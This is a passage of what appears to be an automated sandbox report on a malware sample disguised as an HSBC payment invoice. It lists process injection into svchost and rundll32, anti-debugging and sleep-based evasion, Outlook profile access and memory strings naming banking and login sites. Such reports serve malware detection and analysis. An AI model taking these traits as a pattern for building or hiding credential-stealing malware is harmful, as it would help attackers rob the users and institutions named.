            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000A.00000002.3713104067.000000000051E000.00000002.00000001.01000000.00000005.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000000.1591634837.000000000051E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: HSBCscancopy-invoice778483-payment87476MT103.exe, 00000000.00000003.1262555347.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, HSBCscancopy-invoice778483-payment87476MT103.exe, 00000000.00000003.1261226236.0000000003840000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1521261547.0000000003E9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1521261547.0000000003D00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1430061242.0000000003B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1428153349.0000000003900000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3725946989.0000000004A2E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1521136098.0000000004526000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3725946989.0000000004890000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1523145097.00000000046DE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: HSBCscancopy-invoice778483-payment87476MT103.exe, 00000000.00000003.1262555347.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, HSBCscancopy-invoice778483-payment87476MT103.exe, 00000000.00000003.1261226236.0000000003840000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1521261547.0000000003E9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1521261547.0000000003D00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1430061242.0000000003B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1428153349.0000000003900000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000B.00000002.3725946989.0000000004A2E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1521136098.0000000004526000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3725946989.0000000004890000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1523145097.00000000046DE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: rundll32.pdb source: svchost.exe, 00000002.00000003.1490000919.000000000363B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1489902771.000000000361A000.00000004.00000020.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000A.00000002.3723212263.0000000001488000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: rundll32.pdbGCTL source: svchost.exe, 00000002.00000003.1490000919.000000000363B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1489902771.000000000361A000.00000004.00000020.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000A.00000002.3723212263.0000000001488000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: rundll32.exe, 0000000B.00000002.3728535943.0000000004EBC000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3713462234.0000000002A20000.00000004.00000020.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.000000000356C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.1809205515.000000001E57C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: rundll32.exe, 0000000B.00000002.3728535943.0000000004EBC000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3713462234.0000000002A20000.00000004.00000020.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.000000000356C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.1809205515.000000001E57C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00FB20A0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_00FB20A0
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EA8B85 push ecx; ret 0_2_00EA8B98
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040C958 push ebx; retf 2_2_0040C961
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004191CB push ss; retf 2_2_004191D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414A41 push ds; retf E5D3h2_2_00414A58
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042CAC3 push 6215FF03h; ret 2_2_0042CAD1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040BAD9 push ebp; iretd 2_2_0040BADA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041AAAB push esi; ret 2_2_0041AAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041AB6F push ebx; ret 2_2_0041AB70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041844C push ebp; iretd 2_2_0041844F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403560 push eax; ret 2_2_00403562
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418E12 push eax; retf 2_2_00418E14
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413ED9 push fs; iretd 2_2_00413EDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040C7B0 push edi; retf 2_2_0040C7B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D309AD push ecx; mov dword ptr [esp], ecx2_2_03D309B6
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeCode function: 10_2_0326D301 push ebx; retf 10_2_0326D30A
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeCode function: 10_2_03279B74 push ss; retf 10_2_03279B7C
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeCode function: 10_2_0326D159 push edi; retf 10_2_0326D15A
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeCode function: 10_2_03274882 push fs; iretd 10_2_03274884
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeCode function: 10_2_032797BB push eax; retf 10_2_032797BD
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeCode function: 10_2_0327B518 push ebx; ret 10_2_0327B519
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeCode function: 10_2_03278DF5 push ebp; iretd 10_2_03278DF8
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeCode function: 10_2_0327B454 push esi; ret 10_2_0327B455
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeCode function: 10_2_0326C482 push ebp; iretd 10_2_0326C483
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048927FA pushad ; ret 11_2_048927F9
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0489225F pushad ; ret 11_2_048927F9
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0489283D push eax; iretd 11_2_04892858
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048C09AD push ecx; mov dword ptr [esp], ecx11_2_048C09B6
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04891200 push eax; iretd 11_2_04891369
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_027B8576 push ebp; iretd 11_2_027B8577
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_027CE820 push esi; iretd 11_2_027CE82B
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_027C4EE9 push ebp; iretd 11_2_027C4EEC
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00E84A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00E84A35
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00F055FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00F055FD
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EA33C7 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00EA33C7
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeAPI/Special instruction interceptor: Address: E23284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D7096E rdtsc 2_2_03D7096E
            Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 9838Jump to behavior
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-99736
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeAPI coverage: 4.6 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\rundll32.exe TID: 7284Thread sleep count: 134 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exe TID: 7284Thread sleep time: -268000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exe TID: 7284Thread sleep count: 9838 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exe TID: 7284Thread sleep time: -19676000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe TID: 6372Thread sleep time: -90000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe TID: 6372Thread sleep count: 47 > 30Jump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe TID: 6372Thread sleep time: -47000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe TID: 6372Thread sleep time: -42000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EE4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00EE4696
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EEC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00EEC9C7
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EEC93C FindFirstFileW,FindClose,0_2_00EEC93C
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EEF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00EEF200
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EEF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00EEF35D
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EEF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00EEF65E
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EE3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00EE3A2B
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EE3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00EE3D4E
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EEBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00EEBF27
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_027CC160 FindFirstFileW,FindNextFileW,FindClose,11_2_027CC160
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00E84AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00E84AFE
            Source: rundll32.exe, 0000000B.00000002.3731237782.0000000007A47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .co.inVMware20,15m
            Source: rundll32.exe, 0000000B.00000002.3713462234.0000000002A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllxq
            Source: -9698mK2.11.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
            Source: -9698mK2.11.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
            Source: -9698mK2.11.drBinary or memory string: tasks.office.comVMware20,11696503903o
            Source: -9698mK2.11.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
            Source: rundll32.exe, 0000000B.00000002.3731237782.0000000007A47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l.comVMware20,11Jm
            Source: -9698mK2.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
            Source: -9698mK2.11.drBinary or memory string: www.interactivebrokers.comVMware20,11696503903}
            Source: -9698mK2.11.drBinary or memory string: microsoft.visualstudio.comVMware20,11696503903x
            Source: -9698mK2.11.drBinary or memory string: trackpan.utiitsl.comVMware20,11696503903h
            Source: -9698mK2.11.drBinary or memory string: bankofamerica.comVMware20,11696503903x
            Source: -9698mK2.11.drBinary or memory string: global block list test formVMware20,11696503903
            Source: -9698mK2.11.drBinary or memory string: Interactive Brokers - HKVMware20,11696503903]
            Source: rundll32.exe, 0000000B.00000002.3731237782.0000000007A47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696
            Source: rundll32.exe, 0000000B.00000002.3731237782.0000000007A47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: COM.HKVMware20,11696503903
            Source: -9698mK2.11.drBinary or memory string: secure.bankofamerica.comVMware20,11696503903|UE
            Source: -9698mK2.11.drBinary or memory string: ms.portal.azure.comVMware20,11696503903
            Source: -9698mK2.11.drBinary or memory string: account.microsoft.com/profileVMware20,11696503903u
            Source: rundll32.exe, 0000000B.00000002.3731237782.0000000007A47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,116
            Source: -9698mK2.11.drBinary or memory string: interactivebrokers.comVMware20,11696503903
            Source: -9698mK2.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903
            Source: rundll32.exe, 0000000B.00000002.3731237782.0000000007A47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,116965039
            Source: -9698mK2.11.drBinary or memory string: AMC password management pageVMware20,11696503903
            Source: -9698mK2.11.drBinary or memory string: turbotax.intuit.comVMware20,11696503903t
            Source: -9698mK2.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696503903}
            Source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3723289119.0000000001570000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000F.00000002.1811543669.000001D85E5DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: -9698mK2.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696503903x
            Source: rundll32.exe, 0000000B.00000002.3731237782.0000000007A47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: blocklistVMware2
            Source: rundll32.exe, 0000000B.00000002.3731237782.0000000007A47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e365.comVMware20$m
            Source: -9698mK2.11.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
            Source: -9698mK2.11.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
            Source: -9698mK2.11.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
            Source: -9698mK2.11.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
            Source: -9698mK2.11.drBinary or memory string: outlook.office365.comVMware20,11696503903t
            Source: -9698mK2.11.drBinary or memory string: outlook.office.comVMware20,11696503903s
            Source: -9698mK2.11.drBinary or memory string: netportal.hdfcbank.comVMware20,11696503903
            Source: rundll32.exe, 0000000B.00000002.3731237782.0000000007A47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: on-EU EuropeVMware20,11696503903
            Source: -9698mK2.11.drBinary or memory string: interactivebrokers.co.inVMware20,11696503903d
            Source: -9698mK2.11.drBinary or memory string: dev.azure.comVMware20,11696503903j
            Source: -9698mK2.11.drBinary or memory string: discord.comVMware20,11696503903f
            Source: rundll32.exe, 0000000B.00000002.3731237782.0000000007A47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ivebrokers.co.inVMware20,11696503903~
            Source: -9698mK2.11.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696503903
            Source: rundll32.exe, 0000000B.00000002.3731237782.0000000007A47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PasswordVMware20,11696503903^
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeAPI call chain: ExitProcess graph end nodegraph_0-98025
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeAPI call chain: ExitProcess graph end nodegraph_0-101128
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeAPI call chain: ExitProcess graph end nodegraph_0-98200
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D7096E rdtsc 2_2_03D7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417CC3 LdrLoadDll,2_2_00417CC3
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EF41FD BlockInput,0_2_00EF41FD
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00E83B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00E83B4C
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EB5CCC RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,0_2_00EB5CCC
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00FB20A0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_00FB20A0
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00E234F0 mov eax, dword ptr fs:[00000030h]0_2_00E234F0
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00E23550 mov eax, dword ptr fs:[00000030h]0_2_00E23550
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00E21E70 mov eax, dword ptr fs:[00000030h]0_2_00E21E70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DDE3DB mov eax, dword ptr fs:[00000030h]2_2_03DDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DDE3DB mov eax, dword ptr fs:[00000030h]2_2_03DDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DDE3DB mov ecx, dword ptr fs:[00000030h]2_2_03DDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DDE3DB mov eax, dword ptr fs:[00000030h]2_2_03DDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DD43D4 mov eax, dword ptr fs:[00000030h]2_2_03DD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DD43D4 mov eax, dword ptr fs:[00000030h]2_2_03DD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DEC3CD mov eax, dword ptr fs:[00000030h]2_2_03DEC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03D3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03D3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03D3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03D3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03D3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03D3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D383C0 mov eax, dword ptr fs:[00000030h]2_2_03D383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D383C0 mov eax, dword ptr fs:[00000030h]2_2_03D383C0
